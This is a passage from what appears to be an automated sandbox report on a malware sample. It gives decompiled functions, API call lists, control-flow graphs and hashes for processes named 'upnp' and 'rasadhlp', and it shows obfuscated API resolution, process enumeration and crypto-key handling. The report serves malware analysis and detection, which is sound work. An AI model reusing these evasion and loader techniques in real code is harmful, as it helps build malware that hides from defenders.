                                                                                  • Part of subcall function 00300FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00300F3E
                                                                                  • Part of subcall function 00300FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00300F7F
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 0030061B
                                                                                • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 0030069C
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321178664.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_300000_upnp.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 4043890290-0
                                                                                • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction ID: 0ec2ff1f842f7fbece3e02759ab93b613fa77428c04bb8175d84d2575e5695bd
                                                                                • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction Fuzzy Hash: 2D3176B365924917E32D8A69DC95BFBA3C6DBD1350F08083AF904D22C0D52FD468C265
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00315CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 610 315ce0-315cec call 3165e0 613 315d09-315d0d ExitProcess 610->613 614 315cee-315d04 call 313f00 call 313e60 610->614 614->613
                                                                                C-Code - Quality: 100%
                                                                                			_entry_() {
				void* _t5;
				void* _t9;

				E003165E0();
				if( *0x31ddb8 == 0) {
					 *0x31ddb8 = E00313E60(_t5, E00313F00(0x9bab0b12), 0x89f3d704, _t9);
				}
				ExitProcess(0);
			}





                                                                                0x00315ce0
                                                                                0x00315cec
                                                                                0x00315d04
                                                                                0x00315d04
                                                                                0x00315d0b

                                                                                APIs
                                                                                • ExitProcess.KERNELBASE(00000000), ref: 00315D0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                • Associated: 00000010.00000002.2321183753.0000000000310000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321193940.000000000031D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321198666.000000000031F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_310000_upnp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: e0335a9c58f929177c000ab9c66d9c755e1fe6ab2780b6b06147f5e7e658e134
                                                                                • Instruction ID: a6dd388b88e0b73c93f4820fc78ada63aa6db31d794be32d95ed22f785d16beb
                                                                                • Opcode Fuzzy Hash: e0335a9c58f929177c000ab9c66d9c755e1fe6ab2780b6b06147f5e7e658e134
                                                                                • Instruction Fuzzy Hash: 9BD0C9617442044ADA4EABB568467EA259B4FEA748F108019E011CF296EE248990A360
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00300AD0, Relevance: 2.7, APIs: 2, Instructions: 175memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 619 300ad0-300b31 call 300ed0 622 300b33-300b42 619->622 623 300b47-300b4d 619->623 624 300d40 622->624 625 300b5f-300b7b 623->625 626 300b4f-300b54 623->626 628 300b90 625->628 629 300b7d-300b8e 625->629 626->625 630 300b96-300b9c 628->630 629->630 632 300bae-300bca 630->632 633 300b9e-300ba3 630->633 635 300bd7-300c21 VirtualAlloc 632->635 636 300bcc-300bd4 632->636 633->632 640 300c27-300c2e 635->640 641 300d1a-300d24 635->641 636->635 642 300c30-300c3f 640->642 643 300c44-300c4b 640->643 641->624 642->624 644 300c5d-300c79 643->644 645 300c4d-300c52 643->645 647 300c86-300c8d 644->647 648 300c7b-300c83 644->648 645->644 649 300c9f-300cbb 647->649 650 300c8f-300c94 647->650 648->647 652 300cc8-300cfa VirtualAlloc 649->652 653 300cbd-300cc5 649->653 650->649 656 300d02-300d07 652->656 653->652 656->641 657 300d09-300d18 656->657 657->624
                                                                                APIs
                                                                                  • Part of subcall function 00300FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00300F08
                                                                                  • Part of subcall function 00300FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00300F3E
                                                                                  • Part of subcall function 00300FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00300F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000), ref: 00300BFF
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321178664.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_300000_upnp.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 1654584625-0
                                                                                • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction ID: 6cdc50e3bdff5b348766fb600ca9da07d2f813803c4f9f66f31b5c2bb977bccf
                                                                                • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction Fuzzy Hash: AE510370A41218ABDB25DB54CE86FEAB7B8EF54701F004095FA08BB1D0D7B89D85CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00317080, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E00317080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E003134C0(__ecx);
				if( *0x31dd1c == 0) {
					 *0x31dd1c = E00313E60(__ebx, E00313F00(0x9bab0b12), 0xe4b28d97, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x31e548; // 0x547ec8
				 *(_t17 + 0x30 + _t28 * 4) = _t6;
				_t7 =  *0x31e494;
				if(_t7 == 0) {
					_t7 = E00313E60(_t15, E00313F00(0x9bab0b12), 0x7facde30, _t31);
					 *0x31e494 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x31df30;
				if(_t9 == 0) {
					_t9 = E00313E60(_t15, E00313F00(0x9bab0b12), 0x5010a54d, _t31);
					 *0x31df30 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}











                                                                                0x00317080
                                                                                0x00317082
                                                                                0x00317089
                                                                                0x00317092
                                                                                0x003170aa
                                                                                0x003170aa
                                                                                0x003170b0
                                                                                0x003170b2
                                                                                0x003170b8
                                                                                0x003170bc
                                                                                0x003170c3
                                                                                0x003170d6
                                                                                0x003170db
                                                                                0x003170db
                                                                                0x003170e2
                                                                                0x003170e4
                                                                                0x003170eb
                                                                                0x003170fe
                                                                                0x00317103
                                                                                0x00317103
                                                                                0x00317110

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,0031721D,003168AC), ref: 003170B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321187425.0000000000311000.00000020.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                • Associated: 00000010.00000002.2321183753.0000000000310000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321193940.000000000031D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000010.00000002.2321198666.000000000031F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_310000_upnp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 77cddfa2155256c026fe7719d09a940e7c3ef077cf90bdb5d5a9cec909d622f7
                                                                                • Instruction ID: 5471cb6136b9c2a7383d9f55ea5d2b260f1a7cd04fbf22d7eab61737609dc6ea
                                                                                • Opcode Fuzzy Hash: 77cddfa2155256c026fe7719d09a940e7c3ef077cf90bdb5d5a9cec909d622f7
                                                                                • Instruction Fuzzy Hash: 0901A2317143100B9B1BAF7AAC406EB2ABF9FDD748B10802DA415CF355EE30CD428790
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00300170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00300FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00300F08
                                                                                  • Part of subcall function 00300FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00300F3E
                                                                                  • Part of subcall function 00300FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00300F7F
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 003002F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321178664.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_300000_upnp.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 223123264-0
                                                                                • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction ID: dc921cf32c3c5633435717fe2c0228ba9104e122507ec9cbf028e577dbb6978f
                                                                                • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction Fuzzy Hash: 205149B1901268ABDB24DF64DD94BDEB778EF88700F0044D9F509BB290DB745A85CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00300010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321178664.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_300000_upnp.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                                                • API String ID: 0-211638553
                                                                                • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction ID: 63acf444c1473838b1681cbaebae12ecc49810e69628dbf925eef12d0c0880e7
                                                                                • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction Fuzzy Hash: 66312B38E511289BCB08DB98CD90AED7BB5FF4C340B508027E502737A4DB789986CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003006F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321178664.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_300000_upnp.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction ID: be69b73a93ed6b0b0cbbb50988d1c090a144ebba3c6a259af34f86b0ff9ecbb9
                                                                                • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction Fuzzy Hash: A351D672A063419BD72ADF26C860B5BB3D8BFD4B94F04852EF548E7281E635D804C7A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003008F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000010.00000002.2321178664.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_16_2_300000_upnp.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction ID: 5a0dab8551386602adccfd351df4cce0dfb0b5d62a563bc7b529a70819cdacf1
                                                                                • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction Fuzzy Hash: 654124B17163025BC32DDB29CC65FABB3D9ABC4B50F09493EF640DA2C1D670D90887A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: rasadhlp.exe PID: 2080 Parent PID: 1788 rasadhlp.exeCOMMON

                                                                                Executed Functions

                                                                                Function 00310400, Relevance: 21.1, APIs: 14, Instructions: 132memorynativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 00310448
                                                                                  • Part of subcall function 00311140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00310EFD,00000000), ref: 00311155
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 00310463
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00310484
                                                                                • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 0031048D
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00310492
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 0031049F
                                                                                • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 003104A6
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 003104B9
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 003104E0
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 003104F7
                                                                                • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 00310519
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 00310530
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 00310547
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 00310562
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429415643.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_310000_rasadhlp.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 482429597-0
                                                                                • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction ID: 421acc8dc471240f9b31c821490566ca00b0e996d0ef31cd7fd636d0b85f10c2
                                                                                • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction Fuzzy Hash: 37414FB19143407EE719EB618846FEBB3EDAB8C750F408D2CB7449B141DAB4D9848B62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00324C80, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 370 324c80-324c96 371 324ca0-324ca5 370->371 372 324d63-324d68 371->372 373 324cab 371->373 376 324d86-324d95 372->376 377 324d6a-324d6f 372->377 374 324d24-324d2b 373->374 375 324cad-324cb2 373->375 378 324d48-324d5e 374->378 379 324d2d-324d43 call 323f00 call 323e60 374->379 380 324cb4-324cb9 375->380 381 324d1a-324d1f 375->381 376->378 384 324d97-324db2 call 323f00 call 323e60 376->384 382 324d71-324d76 377->382 383 324db4-324dbb 377->383 378->371 379->378 388 324d02-324d18 380->388 389 324cbb-324cc0 380->389 381->371 382->371 390 324d7c-324d85 382->390 386 324dd8-324dd9 CloseHandle 383->386 387 324dbd-324dd3 call 323f00 call 323e60 383->387 384->378 395 324ddb-324de4 386->395 387->386 388->371 389->382 396 324cc6-324ccd 389->396 401 324cea-324cf5 CreateToolhelp32Snapshot 396->401 402 324ccf-324ce5 call 323f00 call 323e60 396->402 401->395 405 324cfb-324d00 401->405 402->401 405->371
                                                                                C-Code - Quality: 74%
                                                                                			E00324C80(intOrPtr* __ecx, void* __edx) {
				char _v556;
				void* _v560;
				void* __ebx;
				void* _t5;
				intOrPtr* _t6;
				signed int _t7;
				int _t12;
				signed int _t17;
				intOrPtr _t20;
				void* _t21;
				intOrPtr* _t24;
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t44;

				_t41 = _v560;
				_t24 = __ecx;
				_t40 = __edx;
				_t5 = 0xf1114c0;
				goto L1;
				do {
					while(1) {
						L1:
						_t44 = _t5 - 0x29f16ba1;
						if(_t44 > 0) {
							break;
						}
						if(_t44 == 0) {
							_t6 =  *0x32e498;
							if(_t6 == 0) {
								_t6 = E00323E60(_t24, E00323F00(0x9bab0b12), 0xb6f23f63, _t42);
								 *0x32e498 = _t6;
							}
							L14:
							_t7 =  *_t6(_t41,  &_v556);
							asm("sbb eax, eax");
							_t5 = ( ~_t7 & 0xe5fc70a2) + 0x2fd2b757;
							continue;
						} else {
							if(_t5 == 0xf1114c0) {
								_t5 = 0x1f097f05;
								continue;
							} else {
								if(_t5 == 0x15cf27f9) {
									_t17 =  *_t24( &_v556, _t40);
									asm("sbb eax, eax");
									_t5 = ( ~_t17 & 0xfa1eb44a) + 0x2fd2b757;
									continue;
								} else {
									if(_t5 != 0x1f097f05) {
										goto L17;
									} else {
										_t20 =  *0x32e290; // 0x7671733f
										if(_t20 == 0) {
											 *0x32e290 = E00323E60(_t24, E00323F00(0x9bab0b12), 0xbf0ea04d, _t42);
										}
										_t21 = CreateToolhelp32Snapshot(2, 0); // executed
										_t41 = _t21;
										if(_t41 == 0xffffffff) {
											return _t21;
										} else {
											_t5 = 0x2e0e6e55;
											continue;
										}
									}
								}
							}
						}
						L25:
					}
					if(_t5 == 0x2e0e6e55) {
						_t6 =  *0x32e1b4;
						_v556 = 0x22c;
						if(_t6 == 0) {
							_t6 = E00323E60(_t24, E00323F00(0x9bab0b12), 0x188a0580, _t42);
							 *0x32e1b4 = _t6;
						}
						goto L14;
					} else {
						if(_t5 == 0x2fd2b757) {
							if( *0x32de3c == 0) {
								 *0x32de3c = E00323E60(_t24, E00323F00(0x9bab0b12), 0x20de7595, _t42);
							}
							_t12 = CloseHandle(_t41); // executed
							return _t12;
						}
						goto L17;
					}
					goto L25;
					L17:
				} while (_t5 != 0x9d8354f);
				return _t5;
				goto L25;
			}


















                                                                                0x00324c88
                                                                                0x00324c8c
                                                                                0x00324c8f
                                                                                0x00324c91
                                                                                0x00324c96
                                                                                0x00324ca0
                                                                                0x00324ca0
                                                                                0x00324ca0
                                                                                0x00324ca0
                                                                                0x00324ca5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00324cab
                                                                                0x00324d24
                                                                                0x00324d2b
                                                                                0x00324d3e
                                                                                0x00324d43
                                                                                0x00324d43
                                                                                0x00324d48
                                                                                0x00324d4e
                                                                                0x00324d52
                                                                                0x00324d59
                                                                                0x00000000
                                                                                0x00324cad
                                                                                0x00324cb2
                                                                                0x00324d1a
                                                                                0x00000000
                                                                                0x00324cb4
                                                                                0x00324cb9
                                                                                0x00324d08
                                                                                0x00324d0c
                                                                                0x00324d13
                                                                                0x00000000
                                                                                0x00324cbb
                                                                                0x00324cc0
                                                                                0x00000000
                                                                                0x00324cc6
                                                                                0x00324cc6
                                                                                0x00324ccd
                                                                                0x00324ce5
                                                                                0x00324ce5
                                                                                0x00324cee
                                                                                0x00324cf0
                                                                                0x00324cf5
                                                                                0x00324de4
                                                                                0x00324cfb
                                                                                0x00324cfb
                                                                                0x00000000
                                                                                0x00324cfb
                                                                                0x00324cf5
                                                                                0x00324cc0
                                                                                0x00324cb9
                                                                                0x00324cb2
                                                                                0x00000000
                                                                                0x00324cab
                                                                                0x00324d68
                                                                                0x00324d86
                                                                                0x00324d8b
                                                                                0x00324d95
                                                                                0x00324da8
                                                                                0x00324dad
                                                                                0x00324dad
                                                                                0x00000000
                                                                                0x00324d6a
                                                                                0x00324d6f
                                                                                0x00324dbb
                                                                                0x00324dd3
                                                                                0x00324dd3
                                                                                0x00324dd9
                                                                                0x00000000
                                                                                0x00324dd9
                                                                                0x00000000
                                                                                0x00324d6f
                                                                                0x00000000
                                                                                0x00324d71
                                                                                0x00324d71
                                                                                0x00324d85
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00324CEE
                                                                                • CloseHandle.KERNEL32(?,00000000,?,?), ref: 00324DD9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                • String ID: ?sqv
                                                                                • API String ID: 3280610774-1358527836
                                                                                • Opcode ID: d54101e8d2f56b1d040f4634c521c49eabf5d010959a5c0f8fb85712713d7f3a
                                                                                • Instruction ID: 1fcb9c515fac4f73d0dcd64b5cb995fdef67e82855e7bb92d726b4288cb92c1e
                                                                                • Opcode Fuzzy Hash: d54101e8d2f56b1d040f4634c521c49eabf5d010959a5c0f8fb85712713d7f3a
                                                                                • Instruction Fuzzy Hash: D4310032704231978B37AF7DFC8267E22DE9BA0754F11042EF416CB3A2E628CC065792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003225E0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 249encryptionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 413 3225e0-3225ec 414 3225f0-3225f6 413->414 415 3227cb-3227d1 414->415 416 3225fc 414->416 419 3227d7 415->419 420 3228b9-3228bf 415->420 417 322602-322608 416->417 418 322779-322780 416->418 421 32260a 417->421 422 32267b-322681 417->422 427 322782-322798 call 323f00 call 323e60 418->427 428 32279d-3227b1 418->428 425 32287e-322885 419->425 426 3227dd-3227e3 419->426 423 322765-32276b 420->423 424 3228c5-3228cd 420->424 429 322912-32291f 421->429 430 322610-322616 421->430 431 322683-322689 422->431 432 3226e9-3226f1 422->432 423->414 437 322771-322778 423->437 433 3228cf-3228e7 call 323f00 call 323e60 424->433 434 3228ed-322906 424->434 438 3228a2-3228b4 425->438 439 322887-32289d call 323f00 call 323e60 425->439 435 3227e5-3227eb 426->435 436 32282a-322832 426->436 427->428 450 3227b4-3227c6 428->450 441 322921-322937 call 323f00 call 323e60 429->441 442 32293c-322947 429->442 443 32265a-32266b call 3242c0 430->443 444 322618-32261e 430->444 431->423 449 32268f-322696 431->449 453 3226f3-32270b call 323f00 call 323e60 432->453 454 322711-322742 432->454 433->434 483 322972-32297c 434->483 484 322908-32290d 434->484 435->423 452 3227f1-3227f8 435->452 445 322852-322879 436->445 446 322834-32284c call 323f00 call 323e60 436->446 438->414 439->438 441->442 491 322964-322971 442->491 492 322949-32295f call 323f00 call 323e60 442->492 443->437 493 322671-322676 443->493 444->423 456 322624-32262b 444->456 445->414 446->445 462 3226b3-3226e4 CryptDecodeObjectEx 449->462 463 322698-3226ae call 323f00 call 323e60 449->463 450->414 465 322815-322825 452->465 466 3227fa-322810 call 323f00 call 323e60 452->466 453->454 487 322744-32275a call 323f00 call 323e60 454->487 488 32275f 454->488 471 322648-322658 456->471 472 32262d-322643 call 323f00 call 323e60 456->472 462->414 463->462 465->414 466->465 471->414 472->471 484->414 487->488 488->423 492->491 493->414
                                                                                C-Code - Quality: 56%
                                                                                			E003225E0(intOrPtr* __ecx) {
				char _v4;
				char _v8;
				intOrPtr _v32;
				intOrPtr* _t16;
				signed int _t17;
				intOrPtr _t18;
				intOrPtr* _t21;
				intOrPtr _t24;
				intOrPtr* _t25;
				intOrPtr* _t29;
				signed int _t30;
				intOrPtr* _t31;
				intOrPtr* _t33;
				intOrPtr* _t38;
				intOrPtr* _t39;
				intOrPtr* _t43;
				intOrPtr _t45;
				signed int _t46;
				intOrPtr* _t49;
				void* _t57;
				intOrPtr _t59;
				intOrPtr _t76;
				intOrPtr _t81;
				intOrPtr _t87;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t100;
				intOrPtr* _t106;
				void* _t107;
				signed int _t108;
				intOrPtr _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t106 = __ecx;
				_t108 = 0xd12bb4;
				goto L1;
				do {
					while(1) {
						L1:
						_t122 = _t108 - 0x2628db0d;
						if(_t122 > 0) {
							break;
						}
						if(_t122 == 0) {
							_t16 =  *0x32e4d8;
							__eflags = _t16;
							if(_t16 == 0) {
								_t16 = E00323E60(_t57, E00323F00(0x26f5757c), 0x524c2105, _t120);
								 *0x32e4d8 = _t16;
							}
							_t59 =  *0x32e544; // 0x5944a8
							_t17 =  *_t16(_t59 + 0xc, 0, 0, 0x18, 0xf0000040); // executed
							asm("sbb esi, esi");
							_t108 = ( ~_t17 & 0x17df3f88) + 0xd8f2d46;
							continue;
						} else {
							_t123 = _t108 - 0xd8f2d46;
							if(_t123 > 0) {
								__eflags = _t108 - 0x1d3a2703;
								if(_t108 == 0x1d3a2703) {
									_t92 =  *0x32dfcc;
									__eflags = _t92;
									if(_t92 == 0) {
										_t92 = E00323E60(_t57, E00323F00(0x26f5757c), 0xdd726439, _t120);
										 *0x32dfcc = _t92;
									}
									_t18 =  *0x32e544; // 0x5944a8
									_t5 = _t18 + 8; // 0x5944b0
									_t8 = _t18 + 0xc; // 0x2d60778
									 *_t92( *_t8, _v8, _v4, 0, 0, _t5);
									asm("sbb esi, esi");
									_t21 =  *0x32dcfc;
									_t108 = (_t108 & 0xf499d49f) + 0x344059be;
									__eflags = _t21;
									if(_t21 == 0) {
										_t21 = E00323E60(_t57, E00323F00(0x9bab0b12), 0x94189a2, _t120);
										 *0x32dcfc = _t21;
									}
									 *_t21(_v32);
									goto L22;
								} else {
									__eflags = _t108 - 0x256e6cce;
									if(_t108 != 0x256e6cce) {
										goto L22;
									} else {
										_t29 =  *0x32de74;
										__eflags = _t29;
										if(_t29 == 0) {
											_t29 = E00323E60(_t57, E00323F00(0x1829db83), 0xdee5385b, _t120);
											 *0x32de74 = _t29;
										}
										_t30 =  *_t29(0x10001, 0x13,  *_t106,  *((intOrPtr*)(_t106 + 4)), 0x8000, 0,  &_v8,  &_v4); // executed
										asm("sbb esi, esi");
										_t108 = ( ~_t30 & 0xe8f9cd45) + 0x344059be;
										continue;
									}
								}
							} else {
								if(_t123 == 0) {
									_t31 =  *0x32e494;
									_t119 =  *0x32e544; // 0x5944a8
									__eflags = _t31;
									if(_t31 == 0) {
										_t31 = E00323E60(_t57, E00323F00(0x9bab0b12), 0x7facde30, _t120);
										 *0x32e494 = _t31;
									}
									_t107 =  *_t31();
									_t33 =  *0x32df30;
									__eflags = _t33;
									if(_t33 == 0) {
										_t33 = E00323E60(_t57, E00323F00(0x9bab0b12), 0x5010a54d, _t120);
										 *0x32df30 = _t33;
									}
									 *_t33(_t107, 0, _t119);
									__eflags = 0;
									return 0;
								} else {
									if(_t108 == 0xd12bb4) {
										_t38 = E003242C0(_t57, 0x2c);
										 *0x32e544 = _t38;
										__eflags = _t38;
										if(_t38 == 0) {
											goto L23;
										} else {
											_t108 = 0x2628db0d;
											continue;
										}
									} else {
										if(_t108 != 0xc4be8e9) {
											goto L22;
										} else {
											_t39 =  *0x32db2c; // 0x0
											if(_t39 == 0) {
												_t39 = E00323E60(_t57, E00323F00(0x26f5757c), 0x16451606, _t120);
												 *0x32db2c = _t39;
											}
											_t76 =  *0x32e544; // 0x5944a8
											_t1 = _t76 + 0x10; // 0x2d60b20
											 *_t39( *_t1);
											_t108 = 0x3391fecf;
											continue;
										}
									}
								}
							}
						}
						L51:
					}
					__eflags = _t108 - 0x344059be;
